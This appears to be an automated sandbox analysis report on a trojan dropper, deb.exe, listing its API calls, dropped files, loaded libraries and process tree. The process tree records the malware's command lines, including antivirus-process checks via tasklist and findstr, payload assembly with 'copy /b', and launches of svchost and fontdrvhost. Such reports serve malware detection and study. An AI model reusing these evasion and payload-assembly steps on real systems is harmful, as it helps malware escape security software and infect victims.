                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_004044D1
                Source: svchost.exe, 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_45cfe833-3
                Source: svchost.exe, 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_d0a8d349-a
                Source: Yara matchFile source: 18.3.svchost.exe.5060000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.3.svchost.exe.4e40000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6812, type: MEMORYSTR
                Source: C:\Windows\System32\fontdrvhost.exeCode function: 22_2_000001479FB31AA4 NtAcceptConnectPort,NtAcceptConnectPort,22_2_000001479FB31AA4
                Source: C:\Windows\System32\fontdrvhost.exeCode function: 22_2_000001479FB30AC8 NtAcceptConnectPort,NtAcceptConnectPort,22_2_000001479FB30AC8
                Source: C:\Windows\System32\fontdrvhost.exeCode function: 22_2_000001479FB315C0 NtAcceptConnectPort,22_2_000001479FB315C0
                Source: C:\Windows\System32\fontdrvhost.exeCode function: 22_2_000001479FB31CF4 NtAcceptConnectPort,CloseHandle,22_2_000001479FB31CF4
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,4_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeFile created: C:\Windows\HandsLegallyJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeFile created: C:\Windows\CompaniesKitchenJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeFile created: C:\Windows\TextObjectiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeFile created: C:\Windows\BattlefieldBeliefsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeFile created: C:\Windows\DressingThesaurusJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeFile created: C:\Windows\MarshallCommunicationsJump to behavior
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020743400_2_00007FF702074340
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020553600_2_00007FF702055360
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70205C3900_2_00007FF70205C390
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020343A00_2_00007FF7020343A0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020304400_2_00007FF702030440
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70207C4B00_2_00007FF70207C4B0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020474F00_2_00007FF7020474F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70206D4F00_2_00007FF70206D4F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020561380_2_00007FF702056138
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70205B1800_2_00007FF70205B180
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020541A00_2_00007FF7020541A0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70207B1D00_2_00007FF70207B1D0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70206C1D00_2_00007FF70206C1D0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020651ED0_2_00007FF7020651ED
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020402200_2_00007FF702040220
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020682500_2_00007FF702068250
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70204C7300_2_00007FF70204C730
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70207D7300_2_00007FF70207D730
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020607B00_2_00007FF7020607B0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020B07F00_2_00007FF7020B07F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020737F00_2_00007FF7020737F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020638100_2_00007FF702063810
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70206E8000_2_00007FF70206E800
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020418700_2_00007FF702041870
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020808B00_2_00007FF7020808B0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020249000_2_00007FF702024900
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70204D6600_2_00007FF70204D660
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020357000_2_00007FF702035700
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70206FB200_2_00007FF70206FB20
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702047BF00_2_00007FF702047BF0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702056C2A0_2_00007FF702056C2A
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702063C1D0_2_00007FF702063C1D
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702072C400_2_00007FF702072C40
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702068CF00_2_00007FF702068CF0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70204CD100_2_00007FF70204CD10
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020309500_2_00007FF702030950
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70207E9900_2_00007FF70207E990
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020529F00_2_00007FF7020529F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70205C9FF0_2_00007FF70205C9FF
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70202CF500_2_00007FF70202CF50
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020D1F400_2_00007FF7020D1F40
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020720F00_2_00007FF7020720F0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020371000_2_00007FF702037100
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702061D700_2_00007FF702061D70
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702059DA00_2_00007FF702059DA0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70203DDC00_2_00007FF70203DDC0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702064DE00_2_00007FF702064DE0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702038E500_2_00007FF702038E50
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70206AE800_2_00007FF70206AE80
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702074EB00_2_00007FF702074EB0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70205DEA10_2_00007FF70205DEA1
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702079F100_2_00007FF702079F10
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_0040737E4_2_0040737E
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_00406EFE4_2_00406EFE
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004079A24_2_004079A2
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004049A84_2_004049A8
                Source: C:\Windows\System32\fontdrvhost.exeCode function: 22_2_000001479FB30C7022_2_000001479FB30C70
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\542181\Flux.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\Desktop\deb.exeCode function: String function: 00007FF70202F530 appears 32 times
                Source: C:\Users\user\Desktop\deb.exeCode function: String function: 00007FF7020EA130 appears 77 times
                Source: C:\Users\user\Desktop\deb.exeCode function: String function: 00007FF7020EA1D0 appears 56 times
                Source: C:\Users\user\Desktop\deb.exeCode function: String function: 00007FF7020EA040 appears 87 times
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 972
                Source: deb.exeStatic PE information: Number of sections : 20 > 10
                Source: classification engineClassification label: mal100.troj.evad.winEXE@31/29@2/2
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_004024FB CoCreateInstance,4_2_004024FB
                Source: C:\Users\user\Desktop\deb.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ping[1].phpJump to behavior
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4196
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-9b8d4256-c832-6aaaf5-23963194fd2a}
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
                Source: C:\Users\user\Desktop\deb.exeFile created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeJump to behavior
                Source: deb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\deb.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\deb.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\deb.exe "C:\Users\user\Desktop\deb.exe"
                Source: C:\Users\user\Desktop\deb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\deb.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe"
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 542181
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "exports" Fleece
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\542181\Flux.com Flux.com b
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 972
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4196 -s 136
                Source: C:\Users\user\Desktop\deb.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 542181Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "exports" Fleece Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\542181\Flux.com Flux.com bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
